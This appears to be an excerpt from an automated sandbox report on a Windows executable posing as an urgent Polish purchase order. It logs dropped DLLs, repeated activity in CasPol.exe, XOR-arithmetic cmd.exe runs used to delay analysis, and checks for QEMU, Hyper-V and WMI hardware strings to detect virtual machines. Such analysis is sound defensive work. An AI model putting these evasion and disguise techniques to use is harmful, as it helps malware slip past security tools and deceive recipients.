Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: C:\Users\user\AppData\Local\Temp\nsgB1F9.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: C:\Users\user\AppData\Local\Temp\nsgB1F9.tmp\nsExec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: C:\Users\user\Pacifisterne\Automatcafeer\Nedrustningspolitikken\Dilemmaers146\Glasgaibleanir\Nodebilledet\Microsoft.Practices.Composite.UnityExtensions.dll	Jump to dropped file

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Mass process execution to delay analysis

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x19^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x78^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x79^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x08^75"

Tries to detect Any.run

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14099095140.000000000071D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXER
Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14099095140.0000000000700000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEP

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 372	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 372	Thread sleep time: -600000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

Dropped PE file which has not been started: C:\Users\user\Pacifisterne\Automatcafeer\Nedrustningspolitikken\Dilemmaers146\Glasgaibleanir\Nodebilledet\Microsoft.Practices.Composite.UnityExtensions.dll

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 600000			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window / User API: threadDelayed 1890

Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Code function: 1_2_00405FFD FindFirstFileA,FindClose,	1_2_00405FFD
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Code function: 1_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	1_2_0040559B
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Code function: 1_2_00402688 FindFirstFileA,	1_2_00402688

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 600000			Jump to behavior

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

System information queried: ModuleInformation

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	API call chain: ExitProcess graph end node			graph_1-5101
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	API call chain: ExitProcess graph end node			graph_1-5104

Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14152791167.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14099095140.000000000071D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exer
Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14152791167.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14152791167.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14152791167.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14152791167.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 00000089.00000002.18026950300.00000000037E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 00000089.00000002.18026950300.000000000378B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14152791167.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14099095140.0000000000700000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exep
